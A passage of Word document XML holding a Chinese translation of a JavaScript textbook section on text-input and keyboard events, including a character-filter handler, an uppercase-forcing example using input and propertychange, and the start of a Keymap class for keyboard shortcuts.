        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>allowed=target.getAttribute("data-allowed-chars");//</w:t>
      </w:r>
      <w:r>
        <w:t>合法字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var messageid=target.getAttribute("data-messageid");//</w:t>
      </w:r>
      <w:r>
        <w:t>信息元素</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(messageid)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果存在消息元素</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>，那么获取这个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var messageElement=document.getElementById(messageid);//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历输入文本中的字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>text.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>c=text.charAt(i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(allowed.indexOf(c)==-1){//</w:t>
      </w:r>
      <w:r>
        <w:t>这是不允许的字符吗？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果存在不合法字符，显示消息元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(messageElement)messageElement.style.visibility="visible";//</w:t>
      </w:r>
      <w:r>
        <w:t>取消默认行为，所有不会插入文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.preventDefault)e.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.returnValue)e.returnValue=false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果所</w:t>
      </w:r>
      <w:r>
        <w:t>有的字符都合法，隐藏存在的消息元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(messageElement)messageElement.style.visibility="hidden";</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keypress</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件是在新输入的文本真正插入到聚焦的文档元素前触发，这就是这些事件处理程序能够取消事件和阻止文本插入的原因。浏览器也实现了在文本插入到元素后才触发的</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>事件类型</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>。虽然这些事件不能取消，不能指定其事件对象中的最新文本，但它们能以某种形式提供元素文本内容发生改变的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>通知。例如，如果想确保输入框中</w:t>
      </w:r>
      <w:r>
        <w:t>输入的任何文本都是大写，那么可以像如下这样使用</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>事件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>姓氏：＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type="text"oninput="this.value=this.value.toUpperCase();"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准化了</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>事件，除</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>外的所有浏览器都支持它。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中，可以使用不标准的</w:t>
      </w:r>
      <w:r>
        <w:t>propertychange</w:t>
      </w:r>
      <w:r>
        <w:t>事件检测文本输入元素的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性改变来实现相似的效果。例</w:t>
      </w:r>
      <w:r>
        <w:t>17-7</w:t>
      </w:r>
      <w:r>
        <w:t>展示可以用一种跨平台的方式强制所有输入都大写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-7</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>propertychange</w:t>
      </w:r>
      <w:r>
        <w:t>事件探测文本输入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>func</w:t>
      </w:r>
      <w:r>
        <w:t>tion forceToUpperCase(element){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof element==="string")element=document.getElementById(element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>element.oninput=upcase;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>element.onpropertychange=upcaseOnPropertyChange;//</w:t>
      </w:r>
      <w:r>
        <w:t>简易案例：用于</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>事件的处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>upcase(event){this.value=this.value.toUpperCase();}//</w:t>
      </w:r>
      <w:r>
        <w:t>疑难案例：用于</w:t>
      </w:r>
      <w:r>
        <w:t>propertychange</w:t>
      </w:r>
      <w:r>
        <w:t>事件的处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function upcaseOnPropertyChange(event){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var e=event||window.event;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性发生改变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.propertyName==="value"){//</w:t>
      </w:r>
      <w:r>
        <w:t>移除</w:t>
      </w:r>
      <w:r>
        <w:t>onpropertychange</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序，避免循环调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.onpropertychange=null;//</w:t>
      </w:r>
      <w:r>
        <w:t>把值</w:t>
      </w:r>
      <w:r>
        <w:t>都变成大写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.value=this.value.toUpperCase();//</w:t>
      </w:r>
      <w:r>
        <w:t>然后恢复原来的</w:t>
      </w:r>
      <w:r>
        <w:t>propertychange</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.onpropertychange=upcaseOnPropertyChange;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47" w:name="17_9_Jian_Pan_Shi_Jian_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>17.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　键盘事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="447"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当用户在键盘上按下或释放按键时，会发生</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>keyup</w:t>
      </w:r>
      <w:r>
        <w:t>事件。它们由辅助键、功能键和字母数字键产生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>如果用户按键时间足够长会导致它开始重复，那么在</w:t>
      </w:r>
      <w:r>
        <w:t>keyup</w:t>
      </w:r>
      <w:r>
        <w:t>事件到达之前会收到多个</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些事件相关的事件对象都有数字属性</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>，指定了按下的键是哪个。对于产生可打印字符的按键，</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>值是按键上出现的主要字符的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>编码。无论</w:t>
      </w:r>
      <w:r>
        <w:t>Shift</w:t>
      </w:r>
      <w:r>
        <w:t>键处于什么状态，字母键总是产生大写</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>值，这是因为它们出现在物理键盘上。类似地，即使为了输入标点字符而按下了</w:t>
      </w:r>
      <w:r>
        <w:t>Shift</w:t>
      </w:r>
      <w:r>
        <w:t>键，但数字键产生的</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>值就是出现在对应键上的数字。对于不可打印键，</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>属性将是一些其他值。</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>值尚未标准化，但适当的跨浏览器兼容性是可行的。例</w:t>
      </w:r>
      <w:r>
        <w:t>17-8</w:t>
      </w:r>
      <w:r>
        <w:t>包含一个从</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>值到功能</w:t>
      </w:r>
      <w:r>
        <w:t>键名字的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似鼠标事件对象，键盘事件对象有</w:t>
      </w:r>
      <w:r>
        <w:t>altKey</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ctrlKey</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>metakey</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>shiftKey</w:t>
      </w:r>
      <w:r>
        <w:t>属性，当事件发生时，如果对应的辅助键被按下，那么它们会被设置为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>keyup</w:t>
      </w:r>
      <w:r>
        <w:t>事件及</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>属性已经使用了十多年，但从未标准化。</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范草案标准化了</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>keyup</w:t>
      </w:r>
      <w:r>
        <w:t>事件类型，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>但没有尝试标准化</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>。相反，它定义了新属性</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>，它会以字符串的形式包含键名。如果按键对应的是一个可打印字符，那么</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>属性将仅仅是这个可打印字符。如果按键是功能键，那么</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>属性将是像</w:t>
      </w:r>
      <w:r>
        <w:t>"F2"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Home"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"Left"</w:t>
      </w:r>
      <w:r>
        <w:t>这样的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在写本章时，</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件的</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>属性尚未在任何浏览器中实现。但是，像</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>这类基于</w:t>
      </w:r>
      <w:r>
        <w:t>Webkit</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器为这些事件的事件对象定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>keyIdentifier</w:t>
      </w:r>
      <w:r>
        <w:t>属性。类似</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>keyIdentifier</w:t>
      </w:r>
      <w:r>
        <w:t>是字符串而非数字，并且对于功能键，它是像</w:t>
      </w:r>
      <w:r>
        <w:t>"Shift"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Enter"</w:t>
      </w:r>
      <w:r>
        <w:t>这样有用的值。对于可打印字符，该属性保存了这个字符的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>编码的字符串表示形式，其用处要小一些。例如，对于</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>键，它是</w:t>
      </w:r>
      <w:r>
        <w:t>"U+0041"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-8</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>类，把像</w:t>
      </w:r>
      <w:r>
        <w:t>"PageUp"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Alt_Z"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"ctrl+alt+shift+F5"</w:t>
      </w:r>
      <w:r>
        <w:t>这些按键标识符映射到</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数，这些函数会作为按键的响应而调用。以</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象的形式把按键的绑定传给</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，在对象中属性名是按键标识符，而属性值是处理程序函数。使用</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法添加和移除绑定。使用</w:t>
      </w:r>
      <w:r>
        <w:t>install()</w:t>
      </w:r>
      <w:r>
        <w:t>方法在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素（通常是</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象）上配置</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>。通过在元素上注册</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序配置</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>。每</w:t>
      </w:r>
      <w:r>
        <w:t>次键被按下，处理程序检查是否有与按键相关的函数。如果有，就调用它。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序中如果能定义</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件的</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>属性就会优先使用它。如果没有，它会查找</w:t>
      </w:r>
      <w:r>
        <w:t>Webkit</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>keyIdentifier</w:t>
      </w:r>
      <w:r>
        <w:t>属性然后使用它。否则，它退回使用不标准的</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>属性。例</w:t>
      </w:r>
      <w:r>
        <w:t>17-8</w:t>
      </w:r>
      <w:r>
        <w:t>开头有段很长的注释来解释这个模块的更多详细信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-8</w:t>
      </w:r>
      <w:r>
        <w:t>：键盘快捷键的</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*Keymap.js</w:t>
      </w:r>
      <w:r>
        <w:t>：绑定键盘事件和处理程序函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个模块定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个类的实例表示按键标识符（下面有定义）到处理程</w:t>
      </w:r>
      <w:r>
        <w:t>序函数的映射</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>能配置到</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素上以处理</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>当此类事件发生时，</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>会使用它的映射来调用合适的处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>当创建</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>时，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>能传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它表示</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>绑定的初始设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性名是按键标识符，而属性值是处理程序函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>在创建</w:t>
      </w:r>
      <w:r>
        <w:t>Keymap</w:t>
      </w:r>
      <w:r>
        <w:t>之后，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>通过给</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传入按键标识符和处理程序函数可以添加一个新绑定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>能给</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传入按键标识符来移除绑定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
